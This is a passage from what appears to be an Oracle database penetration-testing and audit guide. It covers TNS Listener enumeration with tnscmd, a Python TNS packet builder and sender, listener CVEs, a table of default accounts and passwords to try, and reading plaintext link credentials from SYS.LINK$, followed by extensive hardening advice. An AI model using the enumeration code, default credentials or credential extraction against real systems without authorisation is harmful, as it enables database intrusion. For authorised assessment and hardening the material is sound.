sending (CONNECT_DATA=(COMMAND=ping)) to oraclebox.example.com:1521
writing 87 bytes
reading
.I......"..=(DESCRIPTION=(TMP=)(VSNNUM=135290880)(ERR=0)(ALIAS=LISTENER))
Here we see three things:
- the TNS command: (CONNECT_DATA=(COMMAND=ping))
- the raw TNS packet sent to tnslsnr: .W.......6. [ etc ]
- and the raw TNS reply packet from tnslsnr: .I......"..=(DESCRIPTION=( [etc]
This reply is typical of 'ping' replies. VSNNUM is the Oracle version number encoded as a decimal integer; converted to hexadecimal (for example with the Windows calculator in Scientific mode) it reads off as the version: 135290880 is 0x08106000, that is, 8.1.6.0.0.
There are (at least) three commands that are useful for information gathering, version,
status and services:
unix% tnscmd version -h oraclebox.example.com -p 1521
sending (CONNECT_DATA=(COMMAND=version)) to oraclebox.example.com:1521
writing 90 bytes
reading
.M.......6.........-............(DESCRIPTION=(TMP=)(VSNNUM=135290880)(ERR=0)).
a........TNSLSNR.for.Solaris:.Version.8.1.6.0.0.-.Production..TNS.for.Solaris:
.Version.8.1.6.0.0.-.Production..Unix.Domain.Socket.IPC.NT.Protocol.Adaptor.fo
r.Solaris:.Version.8.1.6.0.0.-.Production..Oracle.Bequeath.NT.Protocol.Adapter
.for.Solaris:.Version.8.1.6.0.0.-.Production..TCP/IP.NT.Protocol.Adapter.for.S
olaris:.Version.8.1.6.0.0.-.Production,,.........@
This is pretty straightforward: version reveals the version of Oracle (in this case, 8.1.6.0.0 for Solaris). Another command, status, is more verbose:
unix% tnscmd status -h oraclebox.example.com -p 1521
sending (CONNECT_DATA=(COMMAND=status)) to oraclebox.example.com:1521
writing 89 bytes
reading
.........6.........`.............j........(DESCRIPTION=(TMP=)(VSNNUM=135290880
)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)(VERSION=TNSLSNR.for.Solaris:.Version.8.
1.6.0.0.-.Production)(START_DATE=01-SEP2000.18:35:49)(SIDNUM=1)(LOGFILE=/u01/
app/oracle/product/8.1.6/network/log/listener.log)(PRMFILE=/u01/app/oracle/pro
[snipped for brevity]
The output is a bit hard to read, but because it's all balanced within parentheses, tnscmd
can break it up with the --indent option and make it readable:
unix% tnscmd status -h oraclebox.example.com -p 1521 --indent
We'll get something like:
DESCRIPTION=
TMP=
VSNNUM=135290880
ERR=0
ALIAS=LISTENER
SECURITY=OFF
VERSION=TNSLSNR.for.Solaris:.Version.8.1.6.0.0.-.Production
START_DATE=01-SEP-2000.18:35:49
SIDNUM=1
LOGFILE=/u01/app/oracle/product/8.1.6/network/log/listener.log
PRMFILE=/u01/app/oracle/product/8.1.6//network/admin/listener.ora
TRACING=off
UPTIME=2032269835
SNMP=OFF
Note SECURITY=OFF: no listener password has been set (it reads SECURITY=ON once a password is configured), so the administrative commands listed in the tnscmd documentation can be issued by anyone who can reach the port.
Note START_DATE and UPTIME. It is not clear whether UPTIME is the tnslsnr uptime or the host uptime.
Note the paths to LOGFILE and PRMFILE. These give a good idea of the filesystem layout and the ORACLE_HOME.
The tnscmd.pl documentation written and maintained by James W. Abendschan at http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html lists a number of TNS Listener commands that can be executed remotely using the tool.
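The exchange above can be reproduced without tnscmd. The Python below is an added example written for this page (not tnscmd's code and not from the ISSAF authors): it builds the TNS CONNECT packet that carries a listener command, which is why tnscmd reports writing 87 bytes for ping (a 58-byte header plus the 29-byte connect string), decodes VSNNUM into the dotted version, and parses the parenthesised reply into the indented form shown above. The field layout is that of a TNS connect packet; the SDU, TDU and protocol-characteristic values are typical client values and are assumptions. The sample reply is constructed from the status output; everything except send_command runs offline.

```python
"""Offline helpers for the TNS Listener exchanges above: build the CONNECT
packet, decode VSNNUM, parse and indent the reply. Added example, not
tnscmd or ISSAF code; SAMPLE_STATUS_REPLY is constructed."""
import socket
import struct

TNS_CONNECT = 1  # packet type byte of a TNS CONNECT packet


def build_connect_packet(command: str) -> bytes:
    """Return a TNS CONNECT packet whose connect data is
    (CONNECT_DATA=(COMMAND=<command>)).

    8-byte header: packet length, packet checksum, type, reserved, header
    checksum. 50-byte connect body: protocol version 310, lowest compatible
    version 300, service options, SDU, TDU, NT protocol characteristics,
    line turnaround, the value 1 (byte-order marker), connect-data length,
    connect-data offset (8 + 50 = 58), maximum receive size, two flag bytes
    and 24 bytes of trace fields. SDU/TDU/characteristics are typical
    client values (assumed); length, type, version and offset are what the
    listener actually checks."""
    data = f"(CONNECT_DATA=(COMMAND={command}))".encode()
    body = struct.pack(">10H", 310, 300, 0, 2048, 32767, 0x7F08, 0, 1, len(data), 58)
    body += struct.pack(">IBB", 0, 0, 0)  # max receive, flags0, flags1
    body += b"\x00" * 24  # trace cross-facility items, unique id, unused
    header = struct.pack(">HHBBH", 8 + len(body) + len(data), 0, TNS_CONNECT, 0, 0)
    return header + body + data


def decode_vsnnum(vsnnum: int) -> str:
    """VSNNUM packs the five-part version into 32 bits: 8-bit major, 4-bit
    minor, 8-bit patch, 4-bit port and 8-bit patch-set fields, which is why
    the hex form reads off as the version: 135290880 = 0x08106000 = 8.1.6.0.0."""
    parts = ((vsnnum >> 24) & 0xFF, (vsnnum >> 20) & 0xF, (vsnnum >> 12) & 0xFF,
             (vsnnum >> 8) & 0xF, vsnnum & 0xFF)
    return ".".join(str(p) for p in parts)


def parse_tns(text: str) -> list:
    """Parse '(KEY=(SUB=v)(SUB2=w))' into nested [(key, value)] lists. Reply
    packets carry a binary prefix, so parsing starts at the first '('.
    A value is a string up to the closing parenthesis, or a nested list."""
    s = text[text.index("("):]
    pos = 0

    def parse_items():
        nonlocal pos
        items = []
        while pos < len(s) and s[pos] == "(":
            eq = s.index("=", pos + 1)
            key = s[pos + 1:eq]
            pos = eq + 1
            if pos < len(s) and s[pos] == "(":
                value = parse_items()
            else:
                end = s.index(")", pos)
                value = s[pos:end]
                pos = end
            if s[pos] != ")":
                raise ValueError(f"unbalanced reply near offset {pos}")
            pos += 1
            items.append((key, value))
        return items

    return parse_items()


def indent(items: list, level: int = 0) -> list:
    """Render parsed items one key per line, like tnscmd --indent."""
    lines = []
    for key, value in items:
        if isinstance(value, list):
            lines.append("  " * level + key + "=")
            lines.extend(indent(value, level + 1))
        else:
            lines.append("  " * level + f"{key}={value}")
    return lines


def listener_summary(reply: bytes) -> dict:
    """Pull the fields worth noting from a ping or status reply."""
    top = dict(parse_tns(reply.decode("latin-1")))
    desc = dict(top.get("DESCRIPTION", []))
    return {
        "version": decode_vsnnum(int(desc["VSNNUM"])) if "VSNNUM" in desc else None,
        "password_set": desc.get("SECURITY", "").upper() == "ON",
        "logfile": desc.get("LOGFILE"),
        "error": desc.get("ERR"),
    }


def send_command(host: str, port: int, command: str, timeout: float = 5.0) -> bytes:
    """Send one listener command and return the raw first reply packet
    (needs network access to a listener; not used by the sample below)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connect_packet(command))
        return sock.recv(4096)


# Constructed sample: the status reply above behind a made-up binary prefix.
SAMPLE_STATUS_REPLY = (
    b"\x00\x90\x00\x00\x04\x00\x00\x00\x00\x88"
    b"(DESCRIPTION=(TMP=)(VSNNUM=135290880)(ERR=0)(ALIAS=LISTENER)"
    b"(SECURITY=OFF)(VERSION=TNSLSNR for Solaris: Version 8.1.6.0.0 - Production)"
    b"(START_DATE=01-SEP-2000 18:35:49)(SIDNUM=1)"
    b"(LOGFILE=/u01/app/oracle/product/8.1.6/network/log/listener.log)(TRACING=off))"
)

if __name__ == "__main__":
    print("\n".join(indent(parse_tns(SAMPLE_STATUS_REPLY.decode("latin-1")))))
    print(listener_summary(SAMPLE_STATUS_REPLY))
```

Against a live listener, send_command("oraclebox.example.com", 1521, "status") returns the bytes that listener_summary expects; a password-protected listener answers ping but refuses status, which shows up as a non-zero ERR rather than the SECURITY field.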
H.2.1.2 TNS LISTENER PROCESS-MANIPULATION VULNERABILITIES
There are a number of serious vulnerabilities in the TNS Listener service. A simple search of CVE with the keywords "Oracle TNS Listener" reveals the following:
CVE-2002-0567: Oracle 8i and 9i with the PL/SQL package for External Procedures (EXTPROC) allows remote attackers to bypass authentication and execute arbitrary functions by using the TNS Listener to connect directly to the EXTPROC process.
CVE-2002-0965: Buffer overflow in the TNS Listener for Oracle 9i Database Server on Windows systems, and Oracle 8 on VM, allows local users to execute arbitrary code via a long SERVICE_NAME parameter, which is not properly handled when writing an error message to a log file.
CVE-2002-1118: TNS Listener in Oracle Net Services for Oracle 9i 9.2.x and 9.0.x, and Oracle 8i 8.1.x, allows remote attackers to cause a denial of service (hang or crash) via a SERVICE_CURLOAD command.
CAN-2001-0499: Buffer overflow in the Transparent Network Substrate (TNS) Listener in Oracle 8i 8.1.7 and earlier allows remote attackers to gain privileges via a long argument to the commands (1) STATUS, (2) PING, (3) SERVICES, (4) TRC_FILE, (5) SAVE_CONFIG, or (6) RELOAD.
CAN-2002-0509: Transparent Network Substrate (TNS) Listener in Oracle 9i 9.0.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a single malformed TCP packet to port 1521.
H.2.1.3 ORACLE BRUTE-FORCE AND POST-AUTHENTICATION ISSUES
Once you identify an Oracle database, the first attempt should be to try to authenticate to the backend database instances. For this you need an Oracle client utility such as the command-line sqlplus or the barely graphical SQL*Plus. Some products, such as ISS Database Scanner (http://www.iss.net) and AuditPro for Databases (http://www.nii.co.in), will run a series of Oracle security checks and carry out a comprehensive audit. AuditPro (my firm's tool, so I am just plugging it) comes with a free license for its operating system audit module whenever you take the database audit module.
The following table lists default Oracle accounts and passwords you can try.
Username | Default Password | Function
SYS | CHANGE_ON_INSTALL | The most powerful account on the database; it owns all the internal objects that make up the database itself.
SYSTEM | MANAGER | The initial, very powerful account from which most object creation is done. Its default password is so well known that it must be changed immediately.
SCOTT | TIGER | Mainly for learning SQL and testing database connectivity over the network. You may choose to keep it, but it inherits all the privileges granted to the PUBLIC role, so those must be restricted or the account completely removed.
DBSNMP | DBSNMP | Required for the Oracle Enterprise Manager Intelligent Agent, which is used for remote database administration. It is preferable not to administer Oracle from a remote console, so this account must be removed or its password changed.
TRACESVR | TRACE | For Oracle Trace collection, which is used to collect performance and resource utilization data.
CTXSYS | CTXSYS | Supports the Context option for function calls contained in the columns attribute.
MDSYS | MDSYS | Supports the Spatial Data Option. Remove or disable unless this option is required.
DEMO | DEMO | As the name suggests.
CTXDEMO | CTXDEMO | Context option demonstration.
APPLSYS | FND |
NAMES | NAMES |
SYSADM | SYSADM |
ORDPLUGINS | ORDPLUGINS | Supports video data attribute information for ORDVideo objects.
OUTLN | OUTLN | Ensures that the SQL query optimizer generates the same final execution plan when the input SQL statements are the same.
ADAMS | WOOD | ADAMS, BLAKE, JONES and CLARK are legacy accounts for education purposes.
BLAKE | PAPER | (as above)
JONES | STEEL | (as above)
CLARK | CLOTH | (as above)
AURORA$ORB$UNAUTHENTICATED | Randomly generated | Used to support the Oracle 8i Aurora JVM facilities of the RDBMS server to concurrently schedule Java execution.
ORDSYS | ORDSYS | Supports the Oracle 8i Time Series Option, enabling work with calendars and time series data.
MTSYS | MTSYS | Supports the Microsoft Transaction Server and the Microsoft Application Demo software.
APPS | APPS |
SAP | SAPR3 | The default username/password combination if SAP is running.
A list of Oracle default accounts and passwords, along with some of the best Oracle security information available in one place, is on Pete Finnigan's website at www.petefinnigan.com. It now even has an RSS feed carrying Pete's analyses of Oracle security issues, newly published articles and new Oracle security alerts. I strongly recommend reading the papers listed there and using the tools and scripts he has put up.
H.2.1.4 POST-AUTHENTICATION ASSESSMENT
Assuming you’ve managed to gain access to the Oracle database using the accounts
shown above, or through a successful exploit, the main attempt should be to get access
to critical tables, and important data.
H.2.1.4.1 THE SYS.LINK$ TABLE
Oracle has a feature called database links, through which one Oracle database connects to another, the first database acting as the client. To connect to the second database the first must supply authentication credentials, which therefore have to be stored somewhere in the first database. They are stored in the table SYS.LINK$, in plain text. If the target system is configured with database links, you can potentially SELECT from LINK$ and retrieve the username and password used to connect to the second database, making it trivial to compromise that database as well.
Caveat: only users with the DBA role, or who can otherwise read SYS-owned tables (for instance through SELECT ANY TABLE when O7_DICTIONARY_ACCESSIBILITY is TRUE; see the initialization parameters below), can read LINK$.
H.2.1.4.2 PRIVILEGE ESCALATION
If you have only managed to guess a non-DBA account and have limited privileges on the system, a number of recent Oracle vulnerabilities can help you elevate your privileges. Several of these were discovered by the team at Nextgen Security Software (www.nextgenss.com), who have decided to withhold the details until early next year, by which time database administrators will have had a chance to patch these issues.
However, David Litchfield, in his presentation at Black Hat USA 2004, gave some clues on how this could be done using the SQL injection vulnerabilities present in default Oracle procedures.
H.2.1.4.3 INITIALIZATION PARAMETERS
Oracle uses a number of parameters that are set during database initialization. They can be read from the V$PARAMETER view. The list below covers the security-relevant parameters and their implications; the text in brackets is the short description Oracle itself gives each parameter.

O7_DICTIONARY_ACCESSIBILITY [Version 7 Dictionary Accessibility Support]
Users with the ANY system privileges (see the section on Privileges) would be allowed to access the objects (tables, views, triggers, etc.) in the SYS schema. These are very critical objects holding very sensitive information, and you can prevent a user from accessing them, even if he has the ANY privileges, by setting this parameter to FALSE. Under no circumstances is it recommended to set this value to TRUE.

audit_trail [Enable system auditing]
To turn auditing on and control whether Oracle generates audit records based on the audit options currently set, set AUDIT_TRAIL to DB in the database's parameter file. This starts Oracle's built-in auditing and directs all audit data to the database audit trail.

db_name [database name specified in CREATE DATABASE]
For information purposes only: the name of the database.

dblink_encrypt_login [enforce password for distributed login always be encrypted]
Specifies whether attempts to connect to remote Oracle databases through database links use encrypted passwords. Prior to Oracle 7.2, passwords were not encrypted before being sent over the network; to connect to older servers, Oracle included this parameter to retry failed connections using the unencrypted format. If DBLINK_ENCRYPT_LOGIN is TRUE and the connection fails, Oracle does not reattempt the connection. If it is FALSE, Oracle reattempts the connection using an unencrypted version of the password, so servers with DBLINK_ENCRYPT_LOGIN set to FALSE can be coerced into sending unencrypted passwords between linked servers. This parameter must be set to TRUE in the init.ora configuration file. (See the section on Database Links for more details.)

instance_name [instance name supported by the instance]
For information purposes only; its value is the same as the one used in the host string.

log_archive_start [start archival process on SGA initialization]
To enable automatic archiving of filled redo log groups each time an instance is started, include LOG_ARCHIVE_START in the database's initialization parameter file and set it to TRUE. The new value takes effect the next time you start the database.

os_authent_prefix
If the database has been configured to use operating system authentication rather than its own, users who are identified on the OS rather than in the database have their database user names prefixed by this value, to distinguish them as OS users. By default the value is OPS$, meaning that a user identified on the operating system as 'user1' will have a corresponding database login 'OPS$user1'.

os_roles [retrieve roles from the operating system]
To operate a database so that it uses the operating system to identify each user's database roles when a session is created, set OS_ROLES to TRUE (and restart the instance, if it is currently running). When a user attempts to create a session with the database, Oracle initializes the user's security domain using the database roles identified by the operating system. This may be set to TRUE if the database is configured to use external operating system authentication.

processes [user processes]
Determines the maximum number of operating system user processes that can be connected to Oracle concurrently. The value must include 5 for the background processes and 1 for each user process; for example, if you plan to have 50 concurrent users, set this parameter to at least 55. Ensure this parameter is set to an acceptable value.

remote_login_passwordfile [password file usage parameter]
Tells Oracle whether to check authentication information in a file created with the orapwd utility instead of the SYS.USER$ table. This is mainly for remote administration of a database from a client PC and should in most cases be strictly avoided; the preferred value is NONE. It can also be set to EXCLUSIVE, which means only one instance can use the file but it can contain hashed passwords for users other than SYS and INTERNAL, or to SHARED, which means multiple instances can use the password file but only hashed passwords for SYS and INTERNAL are allowed. See the section on Users and Roles for more information on the INTERNAL account.

remote_os_authent [allow non-secure remote clients to use auto-logon accounts]
It is strongly recommended that this parameter be set to FALSE. Setting it to TRUE allows a user to connect to the database without supplying a password, as long as he is logged on to his operating system with an allowed user name. An attacker can impersonate the user on his own OS and get connected to Oracle, if the user is set up for remote authentication.

remote_os_roles [allow non-secure remote clients to use os roles]
The same logic applies here. This value must be set to FALSE to prevent a malicious user from connecting to the database and assuming a role that is identified by his own operating system instead of by the database.

resource_limit [master switch for resource limit]
If a database can be temporarily shut down, resource limitation can be enabled or disabled with the RESOURCE_LIMIT initialization parameter in the database's initialization parameter file. Valid values are TRUE (enables enforcement) and FALSE; by default the value is FALSE. Once the parameter file has been edited, the database instance must be restarted for the change to take effect. Every time an instance is started, the parameter value enables or disables the enforcement of resource limitation.

sessions [user and system sessions]
The maximum number of sessions that can connect to the database. Usually you begin with the default value and increase it if you find that peak usage is more than expected.

sql92_security [require select privilege for searched update/delete]
The SQL92 standard specifies that security administrators should be able to require that users have SELECT privilege on a table when executing an UPDATE or DELETE statement that references table column values in a WHERE or SET clause. SQL92_SECURITY lets you specify whether users must have been granted the SELECT object privilege in order to execute such UPDATE or DELETE statements.

utl_file_dir [Directories that the UTL_FILE package can access]
The UTL_FILE package allows Oracle to read and write files on the host operating system. The value of this parameter determines which directories on the OS can be accessed by PL/SQL statements. Setting it to '*' in effect turns off all access control on directories. It must also not be set to the current directory '.'. In fact, access to the UTL_FILE package itself must be severely restricted.
H.2.1.4.4 DEFAULT USERS
The list of users can be seen from the OEM, as shown in the figure below:
[Figure: User Accounts in Oracle 9i (almost all default accounts are locked, except DBSNMP)]
As with any other system, the auditor must ensure that only necessary accounts have been created and that dormant accounts are removed regularly. Dormant accounts can be extracted using the script available at http://www.petefinnigan.com/audit_last_logon.sql. Also, as far as possible, generic accounts must be avoided.
To see all the users created on the system:
SQL>Select * from DBA_USERS
To get only the fields we want to study:
SQL>Select Username, Password, Account_Status, Default_Tablespace, Profile from
DBA_USERS
Let us study each of these columns one by one. The first two columns list all the users created in this database and their hashed passwords. Because the hash is salted only with the username, a default account still carrying its default password has the same hash on every Oracle installation, which is how default-password hashes are recognised. We must ensure that all default accounts have been removed unless they are absolutely required. The problems with default accounts are well known: they are common knowledge, their passwords are also known (see the table of default users and passwords above), and they hold whatever privileges have been granted to the role PUBLIC (more on this in the section on Roles and Privileges).
H.2.1.4.5 PROFILES
The final and most important user parameter is the profile. In Oracle, user account restrictions in terms of password parameters and resource usage are set through profiles. A default installation creates one profile, DEFAULT, which imposes no password or resource restrictions. We must modify this profile to set its parameters appropriately.
Execute the following query to get the values of the parameters in each profile defined in the database:
SQL>Select * from DBA_PROFILES
Next, we describe each parameter and its suggested value. Keep in mind that these are only general recommendations and need to be carefully evaluated for each specific instance; the important thing is that the parameters must be changed from their default settings. This can also be done by running the script utlpwdmg.sql found in $ORACLE_HOME/rdbms/admin, which sets the password limits of the DEFAULT profile and installs a password complexity verification function.
The parameters of each profile are of two types: kernel (resource) and password. Let us look at the password parameters first:
FAILED_LOGIN_ATTEMPTS
The FAILED_LOGIN_ATTEMPTS parameter limits the number of failed login attempts allowed before the account is locked. Setting it to a sensible value stops a malicious user from guessing passwords by repeatedly trying to log in, and alerts the DBA when password guessing occurs (accounts show up as locked). Once an account is locked, it cannot be logged on to for the period given by PASSWORD_LOCK_TIME or until the DBA unlocks it (see PASSWORD_LOCK_TIME and PASSWORD_REUSE_TIME below). Note that a lockout threshold also lets anyone who can reach the listener lock out a named account at will, so pair it with a finite PASSWORD_LOCK_TIME rather than relying on manual unlocking. Default value: UNLIMITED, meaning never lock an account.
Suggested value: a user must be locked out after 3 failed login attempts. Ensure that this value is set to 3, or at most 6, but never more than that.
PASSWORD_LOCK_TIME
When a particular user exceeds a designated number of failed login attempts, the server
automatically locks that user's account. You must specify the permissible number of
failed login attempts using the FAILED_LOGIN_ATTEMPTS parameter above. Here you
can specify the amount of time accounts remain locked. Default value: UNLIMITED.
Suggested value: .0006
PASSWORD_LIFE_TIME
This parameter determines the maximum validity period for a password. The user must
change the password within the value of this parameter. This is one of the most critical
parameters and its value must be set strictly as recommended. Setting this value
ensures users are changing their passwords. Default value: UNLIMITED. Suggested
value: As per the security policy, this may be set to a value between 30-60 days.
PASSWORD_GRACE_TIME
Users enter the grace period upon the first attempt to log in to a database account after
their password has expired. During the grace period, a warning message appears each
time users try to log in to their accounts, and continues to appear until the grace period
expires. Users must change the password within the grace period. If the password is not
changed within the grace period, the account expires and no further logins to that
account are allowed until the password is changed. Default value: UNLIMITED, meaning
never require an account to change the password; Suggested value: 10
PASSWORD_REUSE_TIME
The PASSWORD_REUSE_TIME value specifies the number of days before a password
can be reused. PASSWORD_REUSE_TIME can be set to a specific number of days; to
UNLIMITED; or to DEFAULT, which uses the value indicated in the DEFAULT profile.
Default value: UNLIMITED, which allows passwords to be reused immediately.
PASSWORD_REUSE_TIME is mutually exclusive with PASSWORD_REUSE_MAX. If
PASSWORD_REUSE_TIME is set to a value for a given profile, PASSWORD_REUSE_MAX
must be set to UNLIMITED for the same profile, and vice versa. Suggested value: 1800
PASSWORD_REUSE_MAX
This parameter determines the number of password changes a user must make before
he can reuse his current password. (Compare this with PASSWORD_REUSE_TIME,
wherein he can reuse his password if it is older than x number of days.) This, along with
the other parameters for the profile, further increases the impregnability of the user
accounts. If PASSWORD_REUSE_MAX is set to a value for a given profile,
PASSWORD_REUSE_TIME must be set to UNLIMITED. Default value: UNLIMITED.
Suggested value: UNLIMITED (assuming PASSWORD_REUSE_TIME has been set
appropriately).
PASSWORD_VERIFY_FUNCTION
The PASSWORD_VERIFY_FUNCTION value specifies a PL/SQL function to be used
for password verification when users who are assigned this profile log into a database.
This function can be used to validate password strength by requiring passwords to pass
a strength test written in PL/SQL. The function must be locally available for execution on
the database to which this profile applies. Oracle provides a default script
(utlpwdmg.sql), but you can also create your own function. The password verification
function must be owned by SYS. Default value: NULL, meaning no password verification
is performed. Suggested value: VERIFY_FUNCTION (found in the utlpwdmg.sql script,
or one of your own). As mentioned earlier, the default script utlpwdmg.sql exists to
do this for you. The values set by this script are the ones given here as suggested values.
You may change this script or use the ALTER PROFILE statement to set your own
values.
Finally, we have the Kernel parameters, which are to do with restrictions on resource
usage and help to prevent a Denial of Service situation. Again, the values given here are
only suggestions and you may have to test these on a development database before
applying them on a production setup.
COMPOSITE_LIMIT
Composite Resource Usage limits the total cost of resources used for a session. The
resource cost for a session is the weighted sum of the CPU time used in the session, the
connect time, the number of reads made in the session, and the amount of private SGA
space allocated. Its recommended value is 1000000
SESSIONS_PER_USER
Concurrent Sessions Resource Usage limits the number of connections that a user can
establish without releasing previous connections.
Its recommended value is 1
CPU_PER_SESSION
CPU/Session limits restrict the maximum amount of total CPU time allowed in a session.
The limit is expressed in seconds. Its recommended value is 1000000
CPU_PER_CALL
CPU/Call limits restrict the maximum amount of total CPU time allowed for a call (a
parse, execute, or fetch). The limit is also expressed in seconds. Its recommended value
is 1000000
LOGICAL_READS_PER_SESSION
Reads/Session Resource Usage limits restrict the total number of data block reads
allowed in a session. The limit includes blocks read from memory and disk. Its
recommended value is 50000
LOGICAL_READS_PER_CALL
Reads/Call Resource Usage limits restrict the maximum number of data block reads
allowed for a call (a parse, execute, or fetch) to process a SQL statement. The limit
includes blocks read from memory and disk. Its recommended value is 5000
IDLE_TIME
This setting limits the maximum idle time allowed in a session. Idle time is a continuous
period of inactive time during a session. Long-running queries and other operations are
not subject to this limit. The limit is expressed in minutes. Setting an Idle Time Resource
Usage limit helps prevent users from leaving applications open when they are away from
their desks.
Its recommended value is 15
CONNECT_TIME
Connect Time Resource Usage limits restrict the maximum elapsed time allowed for a
session. The limit is expressed in minutes. Setting a Connect Time Resource Usage limit
helps prevent users from monopolizing a system and can ensure that resources are
released when a user leaves his workstation without logging off the system.
Its recommended value is 90
The default value for all of these parameters is UNLIMITED, and must be changed
according to the values suggested above or those found appropriate depending upon
available resources and expected peak usage.
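As an added example (not part of the ISSAF text), the following statements apply the suggested values from this section to the DEFAULT profile and then list any profile parameter still left at its unrestricted default. It assumes utlpwdmg.sql has already been run as SYS so that verify_function exists; the ALTER SYSTEM step is included because Oracle enforces the Kernel limits only while the RESOURCE_LIMIT parameter is TRUE.

```sql
-- Added example, not ISSAF's own: harden the DEFAULT profile with the values
-- suggested in the text. Run utlpwdmg.sql as SYS first so that verify_function
-- exists (the verify function must be owned by SYS).
ALTER PROFILE DEFAULT LIMIT
    -- Password parameters
    FAILED_LOGIN_ATTEMPTS     3
    PASSWORD_LOCK_TIME        .0006      -- fraction of a day (about one minute)
    PASSWORD_LIFE_TIME        60         -- days; the text allows 30-60
    PASSWORD_GRACE_TIME       10         -- days
    PASSWORD_REUSE_TIME       1800       -- days
    PASSWORD_REUSE_MAX        UNLIMITED  -- must stay UNLIMITED while REUSE_TIME is set
    PASSWORD_VERIFY_FUNCTION  verify_function
    -- Kernel (resource) parameters
    COMPOSITE_LIMIT           1000000
    SESSIONS_PER_USER         1
    CPU_PER_SESSION           1000000
    CPU_PER_CALL              1000000
    LOGICAL_READS_PER_SESSION 50000
    LOGICAL_READS_PER_CALL    5000
    IDLE_TIME                 15         -- IDLE_TIME and CONNECT_TIME are in minutes
    CONNECT_TIME              90;

-- Kernel limits are only enforced while this instance parameter is TRUE.
ALTER SYSTEM SET RESOURCE_LIMIT = TRUE;

-- Verification: every profile parameter still at its unrestricted default.
-- A LIMIT of 'DEFAULT' in another profile inherits from the DEFAULT profile,
-- so hardening DEFAULT covers those rows too. PASSWORD_REUSE_MAX is excluded
-- because UNLIMITED is the intended value when PASSWORD_REUSE_TIME is set.
-- An unset verify function shows up as the string 'NULL' in DBA_PROFILES.
SELECT profile, resource_type, resource_name, limit
FROM   dba_profiles
WHERE  limit IN ('UNLIMITED', 'NULL')
AND    resource_name <> 'PASSWORD_REUSE_MAX'
ORDER  BY profile, resource_type, resource_name;

-- Which users are on which profile: a hardened profile nobody is assigned to
-- protects nothing.
SELECT profile, COUNT(*) AS users
FROM   dba_users
GROUP  BY profile
ORDER  BY users DESC;
```

The first SELECT should return no rows once every profile in use has been hardened.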
H.2.1.4.6 ROLES AND PRIVILEGES
In Oracle, privileges are assigned to roles and roles are assigned to users. You can think
of roles in Oracle as groups in Unix or Windows. This facilitates easier management of
users and privileges. Instead of assigning privileges to 100 users in the accounts
department, you can create one ACCOUNTS role, assign it the required privileges, and
then assign this role to all the 100 users. If, in the future, you decide to remove a privilege
you had granted earlier, all you need to do is remove it from the role, and automatically
all the users assigned to that role will lose the privilege.
To see all the roles that exist in the database:
SQL>Select * from DBA_ROLES
To first see what roles have been granted to a given user, RAKESH:
SQL>Select GRANTEE, GRANTED_ROLE, ADMIN_OPTION, DEFAULT_ROLE from DBA_ROLE_PRIVS where GRANTEE='RAKESH'
Remember that roles can be assigned to users as well as to roles. An entire hierarchy of
roles can be created. For instance, you may create roles ACCOUNTS and PERSONNEL
for the respective departments, and a role MANAGEMENT for senior managers. If the
requirement is to provide MANAGEMENT privileges that have been granted to both
ACCOUNTS and PERSONNEL, then these roles can be assigned to MANAGEMENT.
As a result, to really know all the roles assigned to a user, you must repeatedly execute
the above query for the roles that appear in its result. We will see an example of how to
do this below.
Also, there is one critical role that you must ensure has not been assigned to any
application users: the RESOURCE role. This role includes privileges that are not
required by most application users, and a more restricted role must be granted:
SQL>Select * from DBA_ROLE_PRIVS where GRANTED_ROLE='RESOURCE'
Another role that you must also check for is the CONNECT role. This role grants critical
privileges such as CREATE TABLE, CREATE DATABASE LINK, and several others,
which are not required by the majority of database users. Instead of using the
CONNECT role to grant users access to Oracle, a special role must be created with only
the CREATE SESSION privilege, and then this role must be granted to all users. This
can be checked as follows:
SQL>Select * from DBA_ROLE_PRIVS where GRANTED_ROLE='CONNECT'
Privileges are granted to users/roles using the GRANT statement and are removed using
the REVOKE statement. The possible object privileges in an Oracle database are:
Privilege | Authorization
Select | Read the information from a table or view
Update | Modify the contents of the table or view
Insert | Add new rows of data into a table or view
Delete | Delete one or more rows from a table or view
Execute | Execute or access a function or procedure
Alter | Modify an object's parameters
Read | Read files in a directory
Reference | Create a constraint that refers to a table
Index | Create an index on a table
These are called object privileges, and are granted to users or roles on database objects
such as tables, views, procedures, functions, triggers, synonyms, indices, etc.
The second type of privilege is system privileges. These allow you to connect to the
database, affect database objects, and to create user objects such as tables, views,
indexes and stored procedures.
The syntax for granting privileges is:
SQL>grant <privilege> to <user or role>
To see what privileges a user is granted you must also see what privileges are granted
to the roles that he is assigned. Object and system privileges are stored in the
DBA_TAB_PRIVS and the DBA_SYS_PRIVS views. For RAKESH, check the object
privileges that have been granted:
SQL>Select GRANTEE, OWNER, TABLE_NAME, GRANTOR, PRIVILEGE, GRANTABLE from DBA_TAB_PRIVS where GRANTEE='RAKESH'
You must also ensure that RAKESH has been granted only the appropriate privileges,
according to his functionality requirements.
Here, the GRANTOR and the OWNER can be two different users. This is possible
because of the GRANTABLE field. This field is also known as the ‘WITH GRANT
OPTION’. This option allows the grantee to further grant these privileges to users that he
wants to. This is a dangerous option and must be used sparingly.
To check all object privileges that have been assigned with the ‘WITH GRANT OPTION’:
SQL>Select * from DBA_TAB_PRIVS where GRANTABLE='YES'
Finally, system privileges are stored in the view DBA_SYS_PRIVS. Some system
privileges are CREATE SESSION (to allow the user to connect to the Oracle database),
CREATE TABLE, CREATE VIEW, etc. To check what actions RAKESH can do as far as
creating and manipulating database objects is concerned:
SQL>Select GRANTEE, PRIVILEGE, ADMIN_OPTION from DBA_SYS_PRIVS where GRANTEE='RAKESH'
Once again, you must ensure that RAKESH has the most restrictive set of system
privileges. The other thing to note is the field ADMIN_OPTION. This is somewhat similar
to the field GRANTABLE in the object privileges view DBA_TAB_PRIVS. This field, also
known as 'WITH ADMIN OPTION', allows the GRANTEE to grant these system
privileges to other users or roles. This is similar to the WITH GRANT OPTION for object
privileges and is very critical. To check for all privileges that have been assigned using
the WITH ADMIN OPTION:
SQL>Select * from DBA_SYS_PRIVS where ADMIN_OPTION='YES'
To summarize, what we need to do is this:
1. Pick the user (or we can do this for all users), say RAKESH.
2. Find out all the roles assigned to him:
SQL>SELECT * FROM DBA_ROLE_PRIVS where GRANTEE='RAKESH'
3. Find out the object privileges granted to RAKESH and also to the roles that have been
assigned to RAKESH:
